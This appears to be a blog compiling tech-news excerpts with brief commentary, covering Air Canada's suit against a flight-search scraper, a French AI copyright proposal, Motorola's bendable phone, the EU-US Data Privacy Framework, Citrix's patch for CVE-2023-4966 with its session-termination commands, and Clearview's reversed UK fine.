For its part, Carroll says that he and his lawyers have reached out to Air Canada “repeatedly” to try to work with them on how they “retrieve availability information,” and that “Air Canada has ignored these offers.” He also notes that tons of other websites are scraping the very same information, and he has no idea why he’s been singled out. He further notes that he’s always been open to adjusting the frequency of searches and working with the airlines to make sure that his activities don’t burden the website.
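Carroll’s offer to adjust the frequency of his searches is straightforward to implement on the scraper’s side. A common approach — my sketch of the general technique, not necessarily what Seats.aero actually does — is a token bucket that caps sustained request rate while allowing small bursts:

```python
import time

class TokenBucket:
    """Allow at most `rate` requests per second, with bursts up to `capacity`."""

    def __init__(self, rate, capacity):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill tokens accrued since the last check, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # caller should back off and retry later

bucket = TokenBucket(rate=2, capacity=5)  # ~2 requests/sec, bursts of 5
allowed = sum(bucket.allow() for _ in range(10))
print(allowed)  # only the initial burst gets through; the rest are throttled
```

A polite scraper sleeps whenever `allow()` returns False, which keeps its load on the origin site bounded and predictable regardless of how many queries users make.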

But, really, the whole thing is stupid. The only thing that Carroll’s website does is help people buy more flights. It points people to the Air Canada site to buy tickets. It makes people want to fly more on Air Canada.

Why would Air Canada want to stop that, other than that it can’t admit its website operations should all be replaced by a more competent team?

Source: Air Canada Would Rather Sue A Website That Helps People Book More Flights Than Hire Competent Web Engineers | Techdirt

New French AI Copyright Law Would Effectively Tax AI Companies, Enrich the French Taxman

This blog has written a number of times about the reaction of creators to generative AI. Legal academic and copyright expert Andres Guadamuz has spotted what may be the first attempt to draw up a new law to regulate generative AI. It comes from French politicians, who have developed something of a habit of bringing in new laws attempting to control digital technology that they rarely understand but definitely dislike.

There are only four articles in the text of the proposal, which are intended to be added as amendments to existing French laws. Despite being short, the proposal contains some impressively bad ideas. The first of these is found in Article 2, which, as Guadamuz summarises, “assigns ownership of the [AI-generated] work (now protected by copyright) to the authors or assignees of the works that enabled the creation of the said artificial work.” Here’s the huge problem with that idea:

How can one determine the author of the works that facilitated the conception of the AI-generated piece? While it might seem straightforward if AI works are viewed as collages or summaries of existing copyrighted works, this is far from the reality. As of now, I’m unaware of any method to extract specific text from ChatGPT or an image from Midjourney and enumerate all the works that contributed to its creation. That’s not how these models operate.

Since generative models work from aggregated statistics, there is no way to identify exactly which creators’ works helped produce a given piece of AI output. Guadamuz therefore suggests that the French lawmakers might want creators to be paid according to their contribution to the training material that went into creating the generative AI system itself. Using his own writings as an example, he calculates what fraction of any given payout he would receive with this approach. For ChatGPT’s output, Guadamuz estimates he might receive 0.00001% of any payout that was made. To give an example, even if the licensing fee for some hugely popular work generated using AI were €1,000,000, Guadamuz would only receive 10 cents. Most real-life payouts to creators would be vanishingly small.
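Guadamuz’s back-of-the-envelope figure checks out. Expressed as code (the share and the fee are his illustrative numbers, not real data):

```python
def pro_rata_payout(share_percent, licensing_fee_eur):
    """Pay a creator their percentage share of a licensing fee."""
    return licensing_fee_eur * share_percent / 100

# Guadamuz's estimated share of ChatGPT's training material: 0.00001%
payout = pro_rata_payout(0.00001, 1_000_000)
print(f"{payout:.2f} EUR")  # 0.10 EUR, i.e. 10 cents
```

At realistic licensing fees — orders of magnitude below €1,000,000 — a per-contribution split like this rounds most creators’ payouts down to nothing.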

Article 3 of the French proposal builds on this ridiculous approach by requiring the names of all the creators who contributed to some AI-generated output to be included in that work. But as Guadamuz has already noted, there’s no way to find out exactly whose works have contributed to an output, leaving the only option to include the names of every single creator whose work is present in the training set – potentially millions of names.

Interestingly, Article 4 seems to recognize the payment problem raised above, and offers a way to deal with it. Guadamuz explains:

As it will be not possible to find the author of an AI work (which remember, has copyright and therefore isn’t in the public domain), the law will place a tax on the company that operates the service. So it’s sort of in the public domain, but it’s taxed, and the tax will be paid by OpenAI, Google, Midjourney, StabilityAI, etc. But also by any open source operator and other AI providers (Huggingface, etc). And the tax will be used to fund the collective societies in France… so unless people are willing to join these societies from abroad, they will get nothing, and these bodies will reap the rewards.

In other words, the net effect of the French proposal seems to be to tax the emerging AI giants (mostly US companies) and pay the money to French collecting societies. Guadamuz goes so far as to say: “in my view, this is the real intention of the legislation”. Anyone who thinks this is a good solution might want to read Chapter 7 of Walled Culture the book (free digital versions available), which quotes from a report revealing “a long history of corruption, mismanagement, confiscation of funds, and lack of transparency [by collecting societies] that has deprived artists of the revenues they earned”. Trying to fit generative AI into the straitjacket of an outdated copyright system designed for books is clearly unwise; using it as a pretext for funneling yet more money away from creators and towards collecting societies is just ridiculous.

Source: New French AI Copyright Law Would Effectively Tax AI Companies, Enrich Collection Societies | Techdirt

Motorola’s concept slap bracelet smartphone looks convenient

Forget foldable phones, the next big trend could be gadgets that bend.

Lenovo, which is currently holding its ninth Tech World event in Austin, Texas, showed off its new collaboration with its subsidiary Motorola: a smartphone that can wrap around your wrist like a watch band.

It’s admittedly quite fascinating to see the tech in action. Lenovo calls its device the “Adaptive Display Concept”, which comprises a Full HD Plus resolution (2,228 x 1,080 pixels) pOLED screen that can “be bent and shaped into different” forms to meet the user’s needs. There’s no external hinge either, as the prototype is a single-screen Android phone. The company explains that bending it in half turns the 6.9-inch display into one measuring 4.6 inches across. It can stand upright on the bent portion, in an arc, or wrap around a wrist as mentioned earlier.

Unfortunately, that’s all we know about the hardware itself. The Adaptive Display Concept did appear on stage at Tech World 2023, where the presenter showed off its flexibility by placing it over her arm. Beyond that demonstration, though, both Lenovo and Motorola are keeping their lips sealed tight.

Source: Motorola’s concept ‘bracelet’ smartphone could be a clever final form for foldables | TechRadar

Empowering Responsible and Compliant Practices: Bridging the Gap for US Citizens and Corporations with the New EU-US Data Privacy Framework

The Data Privacy Framework (DPF) presents new legal guidance to facilitate personal data sharing between US companies and their counterparts in the EU and the UK. This framework empowers individuals with greater control over their personal data and streamlines business operations by creating common rules around interoperable dataflows. Moreover, the DPF will help enable clear contract terms and business codes of conduct for corporations that collect, use, and transfer personal data across borders.

Any business that collects data related to people in the EU must comply with the EU’s General Data Protection Regulation (GDPR), which is the toughest privacy and security law across the globe. Thus, the DPF helps US corporations avoid potentially hefty fines and penalties by ensuring their data transfers align with GDPR regulations.

Data transfer procedures, which were historically time-consuming and riddled with legal complications, are now faster and more straightforward with the DPF, which allows for more transatlantic dataflows agreed on by US companies and their EU and UK counterparts. On July 10, 2023, the European Commission finalized an adequacy decision that assures the US offers data protection levels similar to the EU’s.

[…]

US companies can register with the DPF through the Department of Commerce DPF website. Companies that previously self-certified compliance with the EU-US Privacy Shield can transition to the DPF by recertifying their adherence to DPF principles, including updating privacy policies to reflect any change in procedures and data subject rights that are crucial for this transition. Businesses should develop privacy policies that identify an independent recourse mechanism that can address data protection concerns. To qualify for the DPF, a company must fall under the jurisdiction of either the Federal Trade Commission or the US Department of Transportation, though this reach may broaden in the future.

Source: Empowering Responsible and Compliant Practices: Bridging the Gap for US Citizens and Corporations with the New EU-US Data Privacy Framework | American Enterprise Institute – AEI

The whole self-certification thing seems leaky as a sieve to me… And once data has gone into the US intelligence services you can assume it will go everywhere and there will be no stopping it from the EU side.

Citrix urges “immediate” patching as exploit PoC released

Citrix has urged admins to “immediately” apply a fix for CVE-2023-4966, a critical information disclosure bug that affects NetScaler ADC and NetScaler Gateway, admitting it has been exploited.

Plus, there’s a proof-of-concept exploit, dubbed Citrix Bleed, now on GitHub. So if you are using an affected build, at this point assume you’ve been compromised, apply the update, and then kill all active sessions per Citrix’s advice from Monday.

The company first issued a patch for affected devices on October 10, and last week Mandiant warned that criminals — most likely cyberspies — have been abusing this hole to hijack authentication sessions and steal corporate info since at least late August.

[…]

Also last week, Mandiant Consulting CTO Charles Carmakal warned that “organizations need to do more than just apply the patch — they should also terminate all active sessions. These authenticated sessions will persist after the update to mitigate CVE-2023-4966 has been deployed.”

Citrix, in the Monday blog, also echoed this mitigation advice and told customers to kill all active and persistent sessions using the following commands:

kill icaconnection -all

kill rdp connection -all

kill pcoipConnection -all

kill aaa session -all

clear lb persistentSessions

[…]

Source: Citrix urges “immediate” patching as exploit POC • The Register

Clearview Gets $10 Million UK Fine Reversed, Now Owes Slightly Less To Governments Around The World

Here’s how things went for the world’s most infamous purveyor of facial recognition tech when it came to its dealings with the United Kingdom. In a word: not great.

In addition to supplying its scraped data to known human rights abusers, Clearview was found to have supplied access to a multitude of UK and US entities. At that point (early 2020), it was also making its software available to a number of retailers, suggesting the tool its CEO claimed was instrumental in fighting serious crime (CSAM, terrorism) was just as great at fighting retail theft. For some reason, an anti-human-trafficking charity headed up by author J.K. Rowling was also on the customer list obtained by Buzzfeed.

Clearview’s relationship with the UK government soon soured. In December 2021, the UK government’s Information Commissioner’s Office (ICO) said the company had violated UK privacy laws with its non-consensual scraping of UK residents’ photos and data. That initial declaration from the ICO came with a $23 million fine attached, one that was reduced to a little less than $10 million ($9.4 million) roughly six months later, accompanied by demands Clearview immediately delete all UK resident data in its possession.

This fine was one of several imposed on the company by foreign governments. The Italian government — citing EU privacy law violations — levied a $21 million fine. The French government came to the same conclusions and the same penalty, adding another $21 million to Clearview’s European tab.

The facial recognition tech company never bothered to proclaim its innocence after being fined by the UK government. Instead, it simply stated the UK government had no power to enforce this fine because Clearview was a United States company with no physical presence in the United Kingdom.

In addition to engaging in reputational rehab on the UK front, Clearview went to court to challenge the fine levied by the UK government. And it appears to have won this round for the moment, reducing its accounts payable ledger by about $10 million, as Natasha Lomas reports for TechCrunch.

[I]n a ruling issued yesterday its legal challenge to the ICO prevailed on jurisdiction grounds after the tribunal ruled the company’s activities fall outside the jurisdiction of U.K. data protection law owing to an exemption related to foreign law enforcement.

Which is pretty much the argument Clearview made months ago, albeit less elegantly after it was first informed of the fine. The base argument is that Clearview is a US entity providing services to foreign entities and that it’s up to its foreign customers to comply with local laws, rather than Clearview itself.

That argument worked. And it worked because it appears the ICO chose the wrong law to wield against Clearview. The UK’s GDPR does not protect UK residents from actions taken by “competent authorities for law enforcement purposes.” (lol at that entire phrase.) Government customers of Clearview are only subject to the adopted parts of the EU’s Data Protection Act post-Brexit, which means the company’s (alleged) pivot to the public sector puts both its actions — and the actions of its UK law enforcement clients — outside of the reach of the GDPR.

Per the ruling, Clearview argued it’s a foreign company providing its service to “foreign clients, using foreign IP addresses, and in support of the public interest activities of foreign governments and government agencies, in particular in relation to their national security and criminal law enforcement functions.”

That’s enough to get Clearview off the hook. While the GDPR and EU privacy laws have extraterritorial provisions, they also make exceptions for law enforcement and national security interests. GDPR has more exceptions, which made it that much easier for Clearview to walk away from this penalty by claiming it only sold to entities subject to this exception.

Whether or not that’s actually true has yet to be determined. And it might have made more sense for the ICO to prosecute this under the parts of EU law the UK government decided to adopt after deciding it no longer wanted to be part of this particular union.

Even if the charges had stuck, it’s unlikely Clearview would ever have paid the fine. According to its CEO and spokespeople, Clearview owes nothing to anyone. Whatever anyone posts publicly is fair game. And if the company wants to hoover up everything on the web that isn’t nailed down, well, that’s a problem for other people to be subjected to, possibly at gunpoint. Until someone can actually make something stick, all they’ve got is bills they can’t collect and a collective GFY from one of the least ethical companies to ever get into the facial recognition business.

Source: Clearview Gets $10 Million UK Fine Reversed, Now Owes Slightly Less To Governments Around The World | Techdirt